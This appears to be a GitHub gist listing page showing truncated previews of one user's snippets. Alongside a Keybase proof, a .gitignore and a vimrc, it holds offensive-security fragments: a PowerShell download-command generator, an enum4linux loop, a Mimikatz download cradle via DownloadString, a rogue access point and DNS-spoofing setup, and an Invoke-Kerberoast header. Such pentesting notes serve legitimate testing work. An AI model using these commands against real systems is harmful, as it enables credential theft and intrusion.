I hereby claim:
- I am jaredhaight on github.
- I am jaredhaight (https://keybase.io/jaredhaight) on keybase.
- I have a public key whose fingerprint is 517C 3E62 0B3C 12F1 01C6 DEF7 EE1C 9ED5 4781 F114
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm | |
*.iml | |
## Directory-based project format: | |
.idea/ | |
# if you remove the above rule, at least ignore the following: | |
# User-specific stuff: | |
# .idea/workspace.xml |
syntax on | |
set nocompatible | |
set wildmenu | |
set number | |
set tabstop=4 |
#! /usr/bin/python | |
import sys | |
if len(sys.argv) !=3: | |
print "Usage: gen_ps1_wget.py <http_server> <file_to_download>" | |
sys.exit(0) | |
print "\n" | |
print "Copy and paste the following in to the host:" | |
print "\n" |
if [ -z "$1" ]; then | |
echo "Usage: $0 <file_with_ips>" | |
exit 0 | |
fi | |
echo "Running enum4linux\n" | |
echo "IP File: $1" | |
echo "\n" | |
for ip in $(cat $1);do |
$Source = @" | |
using System; | |
using System.IO; | |
using System.Text; | |
using System.IO.Compression; | |
using System.Collections.Generic; | |
using System.Runtime.InteropServices; | |
using System.Security.Cryptography; |
# This is broken out bit by bit to show whats going on | |
# Here we point to the url for the raw ps1 file for invoke-mimikatz | |
$mkatz_ps1_url = "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1" | |
# Here we call the .NET framework to create a webclient object and download | |
# the raw file from the url, assigning the contents of the file to the | |
# $mkatz_dl var. | |
$mkatz_dl = (New-Object Net.WebClient).DownloadString($mkatz_ps1_url) |
#### INIT SCRIPT #### | |
#!/bin/bash | |
######################################################### | |
# # | |
# * Make sure to update hostapd.conf to use the monitor # | |
# interface (default is wlan0) # | |
# * Add MACs of devices you are working with to the # | |
# allowed_macs file # | |
# * Add DNS entries you're spoofing to dns_entries # |
<# | |
Invoke-Kerberoast.ps1 | |
Author: Will Schroeder (@harmj0y), @machosec | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (https://github.com/nidem/kerberoast). | |
Note: the primary method of use will be Invoke-Kerberoast with various targeting options. |